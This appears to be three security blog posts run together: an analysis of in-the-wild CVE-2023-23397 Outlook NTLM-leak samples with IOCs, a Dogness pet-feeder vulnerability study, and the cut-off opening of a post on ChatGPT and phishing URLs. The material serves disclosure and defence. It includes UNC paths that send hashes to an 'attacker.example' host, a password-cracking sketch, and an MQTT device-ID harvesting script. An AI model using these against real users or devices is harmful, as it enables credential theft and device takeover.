Comprehensive analysis of initial attack samples exploiting CVE-2023-23397 vulnerability

On March 14, 2023, Microsoft published a blog post describing an Outlook client elevation-of-privilege vulnerability (CVSS: 9.8, Critical). The publication generated a lot of activity among white-, grey- and black-hat researchers, as well as numerous publications and tweets about the vulnerability and its exploitation. Below, we highlight the key points and then focus on the initial use of this vulnerability by attackers before it became public.

Affected products include all supported versions of Microsoft Outlook for Windows. Other versions of Microsoft Outlook, such as those for Android, iOS, macOS, and Outlook on the web and other MS365 services, are not affected.

The CVE-2023-23397 vulnerability

From a technical point of view, the vulnerability is a critical EoP that is triggered when an attacker sends an Outlook object (task, message, or calendar event) containing an extended MAPI property with a UNC path to an SMB share on a threat actor-controlled server, resulting in a Net-NTLMv2 hash leak. No user interaction is required. The NTLM leak occurs when the reminder window is displayed, not merely when the message is received. However, a reminder that has already expired fires immediately upon receipt of the object!

The connection to the remote SMB server sends the user’s Net-NTLMv2 hash in a negotiation message, which the threat actor can use to either:

  • Relay it for authentication against other systems that support NTLMv2 authentication.
  • Perform offline cracking to extract the password.

Note: as these are NTLMv2 hashes, they cannot be leveraged as part of a Pass-the-Hash technique.

The affected Net-NTLMv2 hash belongs to the user currently signed in to the Windows device where the Outlook client application is running, regardless of the identity that received the malicious message. If the user does not dismiss the Outlook reminder/task alert, or if the reminder is recurring (i.e., fires multiple times), the user’s Net-NTLMv2 hash may be leaked multiple times.

The vulnerability fix

The fix in the Outlook client code for CVE-2023-23397 is that Outlook’s PlayReminderSound() now calls IsFileZoneLocalIntranetOrTrusted(), which uses MapUrlToZone() to honor the SMB URI only if it is in a trusted/local zone. This means that a UNC path to an INTRANET/TRUSTED local zone can still be abused even on a patched MS Outlook client (SMB local exploitability should still be possible).
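
To illustrate the zone check the fix relies on, here is a minimal sketch (an illustration on our part, not Outlook's actual code) that calls MapUrlToZone() from urlmon.dll via ctypes on a Windows host; the sample paths are hypothetical:

import ctypes
from ctypes import wintypes

URLZONE_NAMES = {0: "LOCAL_MACHINE", 1: "INTRANET", 2: "TRUSTED", 3: "INTERNET", 4: "UNTRUSTED"}
urlmon = ctypes.WinDLL("urlmon")

def zone_of(path: str) -> str:
    # HRESULT MapUrlToZone(LPCWSTR pwszUrl, DWORD *pdwZone, DWORD dwFlags)
    zone = wintypes.DWORD(0)
    hr = urlmon.MapUrlToZone(ctypes.c_wchar_p(path), ctypes.byref(zone), 0)
    if hr != 0:
        raise OSError(f"MapUrlToZone failed with HRESULT 0x{hr & 0xFFFFFFFF:08x}")
    return URLZONE_NAMES.get(zone.value, str(zone.value))

# Hypothetical examples: an internet-zone UNC path is no longer honored by the patched
# reminder code, while an intranet/trusted-zone path still is.
for p in (r"\\203.0.113.10\sounds\alert.wav", r"\\fileserver\sounds\alert.wav"):
    print(p, "->", zone_of(p))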

It appears that the implemented fix could be easily bypassed by forging the malicious UNC path in a particular format, so even a patched client could still be vulnerable (this feature bypass vulnerability was assigned CVE-2023-29324 and patched in May 2023). However, the hotfix remains effective on the server side: the exploit vector cannot be an Exchange server patched against CVE-2023-23397, because such a server removes the extended MAPI property containing the malicious UNC path from any object in transit.

The WebDAV protocol

In the MS Guidance for investigating attacks using CVE-2023-23397, there is a note about WebDAV, quoted below:
“Note: Interaction based on the WebDAV protocol is not at risk of leaking credentials via this exploit technique. While the threat actor infrastructure might request Net-NTLMv2 authentication, Windows will honor the defined internet security zones and will not send (leak) Net-NTLMv2 hashes. In other words, the vulnerability only affects the SMB protocol. If a target device can communicate to threat actor infrastructure over port 445 (SMB), Net-NTLMv2 hashes might be sent; however, if this communication via SMB is not possible, Windows will fall back to leveraging WebDAV. WebDAV will set up a connection with the threat actor infrastructure, but Net-NTLMv2 hashes will not be sent.”

It seems WebDAV already implements proper checks with regard to local intranet/trusted resources, and MS considers the leak effective only when it goes to an external entity. So, the logical reading should be: “The WebDAV protocol is not at risk of leaking credentials via this exploit technique TO ANY NETWORK EXTERNAL ENTITY”. What about the local exploitability of WebDAV?

UNC paths can also be used to make a WebDAV request to an external domain, either by SMB falling back to WebDAV (if SMB traffic to the internet is blocked or otherwise fails, Windows will fall back to using WebDAV – if available – to try to complete the connection), or by forcing WebDAV by appending “@80” or “@SSL@443” to the host name.
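
For illustration only (the host and share names below are hypothetical), such forced-WebDAV UNC paths look like this:

\\attacker.example@80\share\reminder.wav       (forces WebDAV over HTTP on port 80)
\\attacker.example@SSL@443\share\reminder.wav  (forces WebDAV over HTTPS on port 443)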

Internal tests appear to confirm that WebDAV is locally abusable by forcing its use (appending @<port> to the host name) together with a dotless host name (which WebDAV treats as the local network zone); local exploitability should therefore be possible on a PATCHED client for both SMB and WebDAV.

The samples

Evidence of these vulnerabilities being exploited by an unknown attacker has been made public via the submission of samples to VirusTotal. Some samples submitted to VirusTotal in the past were later found to exploit CVE-2023-23397; others were published after the vulnerability was publicly disclosed.

Three variations of the samples were found on VirusTotal:

  • MSG format (full email with message header) -> provides a usage time reference and a supposed target
  • EML format (full email with message header) -> provides a usage time reference and a supposed target
  • TNEF format (only the TASK attachment in TNEF format) -> NO time reference and NO supposed target

Many initial publications about these samples referred to April 2022 as the first available evidence, because the “FirstSeen VT” timestamp of the oldest sample was 2022-04-14 (with a received timestamp in the mail header on the same day).

However, a later sample appeared (in a different format – a TNEF attachment in .eml – that was not detected by the first version of the YARA rule used by VirusTotal) with a “FirstSeen VT” timestamp of 2022-04-01 and a received timestamp in the mail header of 2022-03-18. In any case, the vulnerability had been at the first attacker’s disposal for at least a year.

All publicly available samples found range from 2022-03-18 to 2023-03-29 (this is the last timestamp found in a sample related to a real-world exploit attempt by the attacker). All other samples with a “FirstSeen VT” timestamp starting from 2023-03-15 are mainly tests or POCs or just TNEF attachments missing target and reference timestamp details.

Sample list

Timeline of detected samples

  • Target: Government entity – UA

2022-03-18 – лист.eml
VT First Submission 2022-04-01 06:21:07 UTC
UNC path \\5.199.162.132\SCW (reminder time set to 2019-05-06 20:00)
Sent by: 5.199.162.132 on 2022-03-18 12:01:09 UTC <- THE OLDEST PUBLIC EVIDENCE FOUND TO DATE

  • Target: Government entity – RO

Happy Birthday..msg
VT First Submission 2022-04-14 11:49:27 UTC
UNC path \\101.255.119.42\event\2431 (reminder time set to 2020-10-06 20:00)
Sent by: 101.255.119.42 on 2022-04-14 10:35:39 UTC

Celebration.msg
VT First Submission 2022-05-18 07:26:26 UTC
UNC path \\101.255.119.42\mail\a5b3553d (reminder time set to 2020-04-07 11:30)
Sent by: 101.255.119.42 on 2022-05-17 14:21:25 UTC

  • Target: Energy transportation critical infrastructure – PO

Information!.msg
VT First Submission 2022-08-05 08:22:49 UTC
UNC path relates to 181.209.99.204; based on VT information, it should be \\181.209.99.204\information

  • Target: Military supplier – PO

Silence..eml
VT First Submission 2023-03-23 09:03:23 UTC, but its TNEF attachment VT First Submission 2022-09-29 11:29:43 UTC
UNC path \\213.32.252.221\silence (reminder time set to 2020-03-10 10:30)
Sent by: 213.32.252.221 on 2022-09-09 09:04:23 UTC

  • Target: Transportation critical infrastructure – PO

Interest..msg
VT First Submission 2022-10-05 14:10:40 UTC
UNC path relates to 213.32.252.221 based on VT information

  • Target: Government entity – JO

Information!.msg
VT First Submission 2022-10-25 10:00:00 UTC
UNC path \\168.205.200.55\test (reminder time set to 2019-02-17 19:00)
Sent by: 168.205.200.55 on 2022-10-25 09:12:02 UTC

  • Target: Transport critical infrastructure – PO

Fwd..msg
VT First Submission 2022-11-04 09:28:28 UTC
UNC path \\213.32.252.221\fwd (reminder time set to 2020-03-17 02:30)
Sent by: 213.32.252.221 on 2022-11-03 11:07:23 UTC

Fwd..msg
VT First Submission 2022-11-04 09:27:32 UTC

Silence..msg
VT First Submission 2022-11-04 18:41:05 UTC

Silence..msg
VT First Submission 2022-11-08 20:41:31 UTC

Silence..msg
VT First Submission 2022-11-09 06:50:41 UTC
UNC path relates to 213.32.252.221 based on VT information

  • Target: Energy transportation critical infrastructure – UA

Fwd..msg
VT First Submission 2022-12-01 09:37:36 UTC
UNC path \\69.162.253.21\pets (reminder time set to 2020-03-09 23:30)
Sent on 2022-12-01 06:18:15 UTC

Fwd..msg
VT First Submission 2022-12-01 12:19:18 UTC
UNC path \\185.132.17.160\aojv43 (reminder time set to 2021-04-21 11:30)
Sent on 2022-12-01 11:59:46 UTC

  • Target: Energy production critical infrastructure – UA

Report.eml
VT First Submission 2022-12-14 08:47:25 UTC
UNC path \\69.51.2.106\report (reminder time set to 2021-05-19 00:30)
Sent by: 69.51.2.106 on 2022-12-14 07:05:18 UTC

  • Target: Military supplier – TK

Ticaret.msg
VT First Submission 2022-12-29 13:00:43 UTC & VT First Submission 2023-03-16 13:05:21 UTC
UNC path \\113.160.234.229\istanbul (reminder time set to 2022-09-05 22:00)
Sent by: 113.160.234.229 on 2022-12-29 12:39:33 UTC

  • Target: Government entity – UA

Unknown
VT First Submission 2023-03-21 10:47:06 UTC
UNC path \\85.195.206.7\lrmng
Sent by: 85.195.206.7 on 2023-03-15 16:07:48 UTC

  • Target: Military interforce entity – TK

Alarms!.msg
VT First Submission 2023-03-16 13:02:30 UTC
UNC path \\85.195.206.7\lrmng (reminder time set to 2022-02-03 23:30)
Sent by: 85.195.206.7 on 2023-03-15 16:15:07 UTC

  • Target: Space military supplier – IT

Power!
VT First Submission 2023-03-20 07:55:32 UTC
UNC path \\85.195.206.7\power (reminder time set to 2022-01-31 23:30)
Sent by: 77.238.121.148 on 2023-03-17 14:04:54 UTC

  • Target: IT integrator – UA

Reminder!
VT First Submission 2023-03-22 12:20:44 UTC
UNC path \\61.14.68.33\rem (reminder time set to 2022-06-28 21:30)
Sent by: 77.238.121.148 on 2023-03-21 11:13:14 UTC

  • Target: Government entity – SK

Reminder!.eml
VT First Submission 2023-03-29 06:51:54 UTC
UNC path \\61.14.68.33\rem (reminder time set to 2022-06-28 21:30)
Sent by: 77.238.121.148 on 2023-03-22 09:13:09 UTC

Reminder!.eml
VT First Submission 2023-03-27 08:59:44 UTC
UNC path \\61.14.68.33\rem (reminder time set to 2022-06-28 21:30)
Sent by: 77.238.121.148 on 2023-03-22 09:17:19 UTC

  • Target: IT integrator – UA

CC.eml
VT First Submission 2023-03-29 13:51:50 UTC
UNC path \\42.98.5.225\ping (reminder time set to 2023-01-31 01:00)
Sent by: 42.98.5.225 on 2023-03-29 12:36:10 UTC

Initial attack IOCs

Threat-relevant IOCs are the embedded malicious UNC paths and IPs (not the hashes of the sample files, which are just MSG/EML exports of the malicious TASK exploiting the vulnerability and are useless for threat detection/verification).

URLs (#16)

\\5.199.162[.]132\SCW
\\101.255.119[.]42\event\2431
\\101.255.119[.]42\mail\a5b3553d
\\181.209.99[.]204\information
\\213.32.252[.]221\silence
\\168.205.200[.]55\test
\\213.32.252[.]221\fwd
\\69.162.253[.]21\pets
\\185.132.17[.]160\aojv43
\\69.51.2[.]106\report
\\113.160.234[.]229\istanbul
\\85.195.206[.]7\lrmng
\\24.142.165[.]2\req
\\85.195.206[.]7\power
\\61.14.68[.]33\rem
\\42.98.5[.]225\ping

IPs (#14)

5.199.162[.]132 (not in MS Guidance publication)
101.255.119[.]42
181.209.99[.]204
213.32.252[.]221
168.205.200[.]55
69.162.253[.]21
185.132.17[.]160
69.51.2[.]106 (not in MS Guidance publication)
113.160.234[.]229
85.195.206[.]7
24.142.165[.]2 (not in MS Guidance publication)
61.14.68[.]33
42.98.5[.]225 (not in MS Guidance publication)
82.196.113[.]102 (only in MS Guidance publication – on VT relating to hash 92df1d2125f88d0642e0d4919644376c09e1f1e0eaf48c31a6b389265e0d5576, but missing the sample and any additional information)

Threat verification

Any attempt to communicate to the IPs/URIs listed in the above IOCs and found in any logs should be considered suspicious and investigated further.

Alternatively, to determine if an organization has been targeted by attempts to exploit this vulnerability, Microsoft has provided documentation for a script that checks all Outlook objects (tasks, email messages and calendar items) to see if the specific property is populated with a UNC path. If objects are detected that point to an unrecognized share, they should be investigated further. Microsoft has provided detailed guidance on how to do this.
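
As a rough complement to that guidance (and not a replacement for the Microsoft script), the sketch below shows one way to sweep exported messages or plain-text logs for the indicators listed in the next section; the folder name is a placeholder and the IPs are re-fanged from the IOC list:

import re
from pathlib import Path

IOC_IPS = [
    "5.199.162.132", "101.255.119.42", "181.209.99.204", "213.32.252.221",
    "168.205.200.55", "69.162.253.21", "185.132.17.160", "69.51.2.106",
    "113.160.234.229", "85.195.206.7", "24.142.165.2", "61.14.68.33",
    "42.98.5.225", "82.196.113.102",
]
PATTERN = re.compile("|".join(re.escape(ip) for ip in IOC_IPS).encode())

def scan(root: str) -> None:
    # Walk a folder of exported .msg/.eml files or plain-text logs and report hits.
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        data = path.read_bytes()
        for match in set(PATTERN.findall(data)):
            print(f"{path}: hit for {match.decode()}")

scan("./exports")  # hypothetical folder of exported messages/logs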

A note about attacker infrastructure

It’s easy to see that many of the IPs used by the attacker have/had similarities in terms of connected equipment.

IP Net exposed service history
5.199.162[.]132 No Info
101.255.119[.]42 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
181.209.99[.]204 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks
213.32.252[.]221 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks
168.205.200[.]55 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, port UDP 10001 Ubiquiti Networks Device_Hostname: _Product: N5N_Version: XM.ar7240.v5.6.6.29183.160526.1225 @2022-06-16
69.162.253[.]21 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, port UDP 10001
185.132.17[.]160 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
69.51.2[.]106 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
113.160.234[.]229 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
85.195.206[.]7 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks
24.142.165[.]2 No Info
61.14.68[.]33 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
42.98.5[.]225 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
82.196.113[.]102 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222

This is obviously not random, but a common point for the attacker.

One of the IPs used by the attacker exposes the WebUI of an internet access router.

Some researchers have argued that an attacker may have exploited a vulnerability in the firmware of these routers to compromise them and use them in the attack. This may be possible, but it may also be that the attacker simply found this router configured with weak/default credentials and exploited it.

Further investigation into the type of network equipment used by the attacker confirmed that it could be an optimal platform for the threat. For example, this router is typically used by ISPs on the customer side and its firmware provides a Command Line Interface (CLI) accessible directly through a WebUI. Use of the CLI from WebUI doesn’t leave any source IP information in the OS logs because the connection originates locally from 127.0.0.1; only traces of connections to the WebUI could be stored in the firewall logs.

The screenshot of the router’s CLI (obtained from the test equipment)

Moreover, the router’s operating system ships with native Python 2.7, and a well-known fake SMB server for collecting NTLM hashes already exists in the form of the hacking tool “Responder”, which is implemented as a Python script. It is worth noting that an open SMB server on the public internet will receive a lot of connections from scanning attempts unrelated to the attacker’s samples. Thus, we can assume that the attacker collected all the data from the fake SMB server and then post-processed it to exclude the scanning noise, extracting only the threat-relevant data.

In any case, using routers connected to the public internet as an attack source is a clever way to collect data on the threat targets without relying on a dedicated host, and it offers an easy way to delete any logs/traces of the malicious activity. ISP routers may have other aspects of their OS architecture that allow cybercriminals to exploit them for malicious activity, such as publicly known default credentials or highly volatile logs that do not record source IP information and can be lost with a simple reboot. For example, on the router assumed to have been used in the attack, the log folder is mounted on a volatile in-memory filesystem:

tmpfs /var/log tmpfs rw,nosuid,nodev,noexec,relatime,mode=755 0 0

Organizations can safeguard against cyberthreats targeting ISP routers through regular firmware updates, strong authentication, network segmentation, firewall configuration, IDPS deployment, monitoring and logging, as well as network traffic analysis, security awareness training for employees and regular security assessments.

A bowl full of security problems: Examining the vulnerabilities of smart pet feeders

Introduction

In today’s interconnected world, more and more devices are being connected to the internet, including everyday household items such as pet feeders, which become “smart” by virtue of that simple fact. However, as these devices grow more sophisticated, they also become more vulnerable to cyberattacks. In this blog post, we discuss the results of a vulnerability research study focused on a popular model of smart pet feeder. The findings reveal a number of serious security issues, including the use of hard-coded credentials and an insecure firmware update process. These vulnerabilities could allow an attacker to gain unauthorized access to the device and steal sensitive information, such as video footage, potentially turning the feeder into a surveillance tool. In addition, tampering with the feeding schedules could endanger the pet’s health and place an additional financial and emotional burden on the owner. Finally, the study highlights the risk of a chain-reaction attack: once an attacker gains control of a pet feeder in the home network, it can be used as a hub to launch further attacks against other devices on the network.

Smart pet feeders: What they do

Smart pet feeders are internet-connected devices that dispense pre-set portions of food according to a pre-set schedule and allow you to monitor or communicate with your pet remotely. For the latter purpose they are often equipped with a microphone, speaker and camera.

Typically, pet feeders are controlled by a mobile application that allows you to set, update and manage them. Communication between the device and the app takes place via a cloud server. The first time the feeder is used, the user must set up the wireless network that the feeder will use from this app.

Methodology

For this research, we chose a popular Dogness device model and were able to identify security issues in it. We approached the device by first analyzing the network traffic between the mobile application and the cloud, and between the cloud and the pet feeder. We did this by placing the device in a sandboxed environment from the outset. We also used dynamic instrumentation to bypass SSL certificate verification (SSL pinning) in the application. For convenience, the app ran on an ARM64 single-board computer (Raspberry Pi 4B) running Android 11.

The described setup allowed us to verify the information passing through, for example, during the over-the-air update process.

Then, more specifically, we analyzed the mobile application itself using static reverse engineering of the different use cases.

We also proceeded to crack open the device, looking for debugging interfaces that would allow us to interact with the running device while having full access to its internals. Further hardware analysis of the circuit board helped us identify chips. We later managed to extract the firmware from the EEPROM for further static reverse engineering. Where relevant, fuzzing of some key libraries was performed to try to identify memory corruption bugs in the request handling functions.

Telnet running with hard-coded root credentials

One of the major vulnerabilities discovered in the smart pet feeder is the presence of a Telnet server running on the default port, with a root account that can be accessed remotely. The root account credentials for this Telnet server can be easily recovered by extracting the firmware from the device and cracking the hashes from the /etc/shadow file. A hard-coded root password is a significant security issue because all devices of the same model share the same root password.
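
As a rough illustration of that step (the hash and wordlist below are placeholders, not the device’s real values), a candidate password can be checked against a shadow entry with Python’s crypt module on a Unix host:

import crypt

shadow_hash = "$6$placeholder_salt$placeholder_hash"  # entry copied from /etc/shadow in the dumped firmware
with open("wordlist.txt", encoding="utf-8", errors="ignore") as wordlist:
    for candidate in wordlist:
        candidate = candidate.strip()
        # crypt.crypt() reuses the method and salt from the full hash string
        if crypt.crypt(candidate, shadow_hash) == shadow_hash:
            print("root password found:", candidate)
            break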

The hard-coded root password

This root account can be used over the previously mentioned Telnet service on port 23 to gain full access to the device.

Connection to Telnet port 23 using the hard-coded root password

A remote attacker with such access can execute arbitrary code, modify the device settings, and steal sensitive information, including live video being recorded and sent to the cloud server.

Plaintext communication with the cloud

Not only is gaining access trivial, but the feeder’s communication with the cloud, including the authentication process, is in cleartext. This vulnerability is also particularly dangerous because it allows a remote attacker sitting between the device and the cloud to gain persistence on the pet feeder – even without having access to the device firmware – and to launch further attacks against other devices in the network and potentially steal more sensitive information such as personal identification information, credit card details, or other personal information.

Smart device manufacturers should focus on adding security features such as dynamic credential generation and secure communication protocols to ensure the safety of their products.

MQTT broker for Alexa support with hard-coded credentials

The Dogness smart pet feeder device has the ability to work with Alexa, allowing users to control the device through voice commands. The device uses an executable file that connects to a Message Queuing Telemetry Transport (MQTT) broker to receive and process Alexa commands. The problem with this setup is that the user name and password for the MQTT broker are hard-coded into the executable. This means that the credentials are embedded in the software and are the same for all devices of the same model.

The hard-coded MQTT broker credentials

The Alexa communication process is as follows. The device launches a binary called mqtt_alex that embeds the MQTT client code, which tries to connect to a server IP provided as an argument, and then tries to connect to a hard-coded domain name if it fails. Another IP address is found in the bash script called run_alex.sh that launches the mqtt_alex binary, but it’s commented out, which may indicate that this IP address belongs to a vendor test environment.

Upon successful connection, a series of subscription calls is made to the following topics, where the last subtopic level corresponds to the device ID.

Subscription calls

The device ID used is a 20-byte string generated by the /usr/sbin/get_uid utility at first boot based on the MAC address and two values called ‘uboot UID’ and ‘uboot encrypt’, which are then stored in a temporary file at /tmp/ipcam.txt. The latter two values are static and retrieved from NVRAM, while the first is obviously the only device-dependent value. The device ID is later loaded at the beginning of the MQTT client launch for further communication.

Device ID generation

An attacker connected to the MQTT broker could subscribe to a wildcard topic such as /voice/# to easily get notified of all messages, including the identifiers of other devices. Armed with these identifiers, any command related to the pet’s feeding schedule or food dispensing can be sent to any of the devices whose identifiers have been previously collected by publishing an MQTT message. So, the moment you connect your pet feeder to the MQTT broker to enable voice command control via Alexa, you need to be aware that you are no longer the only one who can set your pets’ feeding schedule.
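
A minimal sketch of that wildcard-subscription problem, assuming the paho-mqtt 1.x client API (the broker address, credentials and topic layout here are placeholders standing in for the hard-coded values):

import paho.mqtt.client as mqtt

BROKER = "broker.example.com"               # placeholder for the hard-coded broker host
USERNAME, PASSWORD = "mqtt_user", "s3cret"  # placeholders for the hard-coded credentials

def on_message(client, userdata, msg):
    # Every device publishing under /voice/<device_id>/... becomes visible here,
    # leaking the device IDs needed to address commands to other feeders.
    print(msg.topic, msg.payload)

client = mqtt.Client()
client.username_pw_set(USERNAME, PASSWORD)
client.on_message = on_message
client.connect(BROKER, 1883)
client.subscribe("/voice/#")   # a single wildcard subscription observes all devices
client.loop_forever()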

The hard-coded credentials pose a significant security risk because an attacker can use them to connect to the MQTT broker. Once connected, an attacker can intercept and modify commands being sent to the device, potentially allowing them to take control of the device. It is critical that manufacturers use dynamic and unique credentials for each device.

Alexa voice command functionality denial of service

The aforementioned MQTT client for handling voice commands receives messages in JSON format, structured like the following example:

{"cmd": "shootreq","feedweight": "1","audioindex": "0","rand": "0"}

The client code responsible for parsing the received MQTT payload simply uses a set of JSON utility functions that call cJSON_GetObjectItem to get each attribute in a separate variable for later use in further internal communication.

JSON utility functions

Although there is no guarantee these calls to the cJSON_GetObjectItem function will not return NULL, the code assumes that they never will. Upon receiving a correctly formatted JSON, with all the attributes, the device will handle it normally and acknowledge with a corresponding resp topic.

Command messages

However, if it receives an incomplete JSON in which at least one of the attributes is missing, the client simply crashes. The following illustrates a JSON payload with the audioindex attribute removed. By exploiting this vulnerability, an attacker would be limited to performing a denial-of-service attack on the device’s voice control functionality. We also need to keep in mind that the run_alex.sh script will restart the binary if it stops.

Broken command message

The bug in the code that parses MQTT messages can lead to a potential denial of service, preventing this functionality from working normally. Although the MQTT client is reloaded after a crash, the attacker can repeatedly send broken commands, rendering the voice command interface inoperable.
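
The underlying fix is simply to validate the message before using any attribute. The firmware code is C built on cJSON, so the following Python sketch is only an illustration of the missing check, with the required attribute names taken from the example above:

import json

REQUIRED_ATTRIBUTES = ("cmd", "feedweight", "audioindex", "rand")

def parse_command(payload: bytes):
    try:
        message = json.loads(payload)
    except (json.JSONDecodeError, UnicodeDecodeError):
        return None                       # malformed JSON: drop instead of crashing
    if not all(key in message for key in REQUIRED_ATTRIBUTES):
        return None                       # missing attribute: reject the command
    return message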

Insecure communication with the backend server

While from the mobile application point of view communication with the cloud is handled via HTTPS with certificate pinning, the device itself behaves differently. The device functions that handle communication are located in a shared library that includes j_processCommandUploadVideo, which is used to upload footage to the backend.

Device functions including j_processCommandUploadVideo

The video footage is pushed to the server using the curl utility, with multiple parameters, including the device ID and an upload key that is hard-coded into the binary. As you can see in the image below, the request is made over a cleartext HTTP connection to the backend server.

Pushing video footage to the cloud

This issue could significantly impact confidentiality, as the device works as a continuous recording camera that is likely to be used indoors, with a strong possibility of capturing a private home environment that may contain sensitive information.

Insecure update process

The Dogness smart pet feeder uses an insecure firmware update process that allows attackers to potentially compromise the device. The firmware update process uses HTTP, an unencrypted protocol, to download the update package from the update server. The package is a compressed archive protected by a password. This password is hard-coded in one of the scripts used in the update process.

The hard-coded ZIP archive password

The HTTP URL to the latest firmware file is generated by the device after receiving the information from a URL hard-coded into the firmware.

http://                       /IMG_Server/images/server_list.txt

Attempting to provide a firmware verification routine that relies on a password-protected archive is insecure, because the password can easily be extracted from the firmware, bypassing this verification. Moreover, no other verification mechanism, such as a digital signature, is implemented in these devices. This is a security issue because an attacker could modify the legitimate firmware, or craft new firmware, and load it onto the device. In addition, because the communication travels over the network in cleartext, an attacker could intercept the data and use it to inject malicious code into the firmware.

Manufacturers should sign their firmware files and establish a reliable signature verification mechanism to ensure the firmware is legitimate and has not been tampered with. Also, any such communication over the network should initially be over secure protocols such as HTTPS.
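
A minimal sketch of the signature-verification part of that recommendation, using the Python cryptography package with a hypothetical Ed25519 vendor key (the key, file names and scheme are our illustrative choices, not the vendor’s):

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey

VENDOR_PUBLIC_KEY = bytes(32)   # placeholder; the real key would be baked into the device at manufacture

def firmware_is_authentic(image: bytes, signature: bytes) -> bool:
    # Verify a detached signature over the downloaded firmware image before flashing it.
    try:
        Ed25519PublicKey.from_public_bytes(VENDOR_PUBLIC_KEY).verify(signature, image)
        return True
    except InvalidSignature:
        return False

# Hypothetical usage:
# firmware_is_authentic(open("update.img", "rb").read(), open("update.sig", "rb").read())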

Conclusion

Assessing the security of devices such as smart pet feeders is not that different from auditing a smart camera with physical actuators that can be remotely controlled. The typical architecture includes various parts, including mobile applications, cloud backend and the device itself, all of which are involved in the operation and maintenance of the device.

To keep users safe, vendors must ensure that all communications to and from the device are protected from eavesdropping and tampering, especially during critical operations such as firmware updates. Using HTTPS instead of HTTP and enforcing certificate pinning not only in the app, but also on the device itself, typically makes it unlikely that an attacker can perform a man-in-the-middle attack. As an additional measure, enforcing firmware signature verification is one way to ensure a firmware update has not been modified or corrupted during the download process. In addition, implementing firmware verification at the boot level also adds another layer of protection by preventing modification via direct hardware access to the memory chip.

Secure credentials management in embedded devices is not necessarily a straightforward issue. Ensuring no hard-coded credentials provide access to anything on the device is a good security practice. Manufacturers must generate credentials at the time of manufacture on a per-device basis, in a way that cannot be guessed based on any available information. For example, using the device’s MAC address as a unique seed for a hash algorithm could eventually be reversed by a motivated attacker. The same concept applies to user-generated/provided credentials that may be stored on the device. Ensuring they are stored in a secure manner that prevents or makes it difficult for an attacker with physical access to extract them is an important security requirement.

Also, any services that can be accessed remotely must undergo a thorough security assessment, especially those that don’t serve the primary purpose of the device. Ideally, if any of these expose users to potential security risks, the vendor should make that clear to the users, along with some practical ways to mitigate those risks. When a firmware update comes out, it is also good practice to point out what kind of security issues it fixes, when it fixes them, and emphasize the risks being eliminated.

Finally, as with any system, users need to keep it updated to ensure they have the vendor’s latest software fixes, including those related to security. As for personal data, it is reasonable to assume the device may store information such as the user’s Wi-Fi credentials in a way that is potentially accessible to anyone with physical access to it, so it is important to perform a hard reset as described in the product manual before reselling or disposing of the device. For the more tech-savvy, a good practice is to connect these devices in a separate network away from critical devices such as home and work computers. Internet providers now ship home routers that can, for example, spin up an additional guest network. This might be a place to consider connecting such IoT devices to reduce the potential damage from unpatched or undiscovered vulnerabilities.

Timeline of communication with the vendor

  • 17/10/2022        First attempt to establish contact with the vendor by email -> No answer
  • 07/11/2022        Second attempt to establish contact with the vendor by email and via social media accounts -> No answer
  • 15/11/2022        Third attempt to establish contact with the vendor by email -> No answer
  • 08/02/2023        Attempt to establish contact with the vendor through the US customer support line by phone -> No answer
  • 21/02/2023        First attempt to establish contact with the vendor through the Chinese customer support line by phone -> Promised to share an R&D contact -> No answer
  • 06/03/2023        Second attempt to establish contact with the vendor through Chinese customer support line by phone -> Shared R&D email contact at Dogness
  • 08/03/2023        Attempt to establish a secure channel for communication with the vendor by email   -> No answer
What does ChatGPT know about phishing?

Hearing all the buzz about the amazing applications of ChatGPT and other language models, our team could not help but ask this question. We work on applying machine learning technologies to cybersecurity tasks, specifically models that analyze websites to detect threats such as phishing. What if all our complex, multi-layered detection systems are now obsolete, and a single LLM (large language model) to rule them all can fight cybercriminals better than we do?

To answer this question, we conducted an experiment to see how good ChatGPT is at recognizing overtly malicious links. In this article, we provide a practical example of how an LLM can be applied to a real, albeit simplified, cybersecurity task, and describe all the interesting things we learned along the way. Since we didn’t have any illusions that ChatGPT could actually be used as a detection method, our primary goal was to find out how much cybersecurity knowledge ChatGPT has learned from its training data and how it could possibly assist a human analyst in their job.

Why URL classification?

An analyst’s trained eye can spot an obviously malicious link in a split second (and you probably can too):

hxxp://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

  • This is not the Office365 login link, is it?

(links in the article are partially masked with x)

A rule of thumb for finding tasks to which ML can be applied is that if a person can do it instantly, almost without thinking, it’s probably a good candidate. Still, building a machine-learning system requires a lot of effort, from gathering data and crafting features to preparing the infrastructure. The promise of replacing all that with a single interface configured via natural language sounds too good to be true, but just how far is it from being a reality?

When conducting this experiment, we were well aware of the limitations of large language models, as well as the fact that OpenAI asks that this emerging technology not be applied to any high-risk area, and states the following regarding GPT-4’s cybersecurity applications in the system card:

However, GPT-4 has significant limitations for cybersecurity operations due to its “hallucination” tendency and limited context window.

It is natural to assume that GPT-3.5-turbo will exhibit these limitations to a greater extent.

We chose the URL classification task because:

  • Unlike a whole HTML page, a URL fits easily into an LLM, because modern LLMs, such as ChatGPT, can only consume a limited number of symbols (more precisely, tokens) at a time (they have a fixed context window, in LLM-speak).
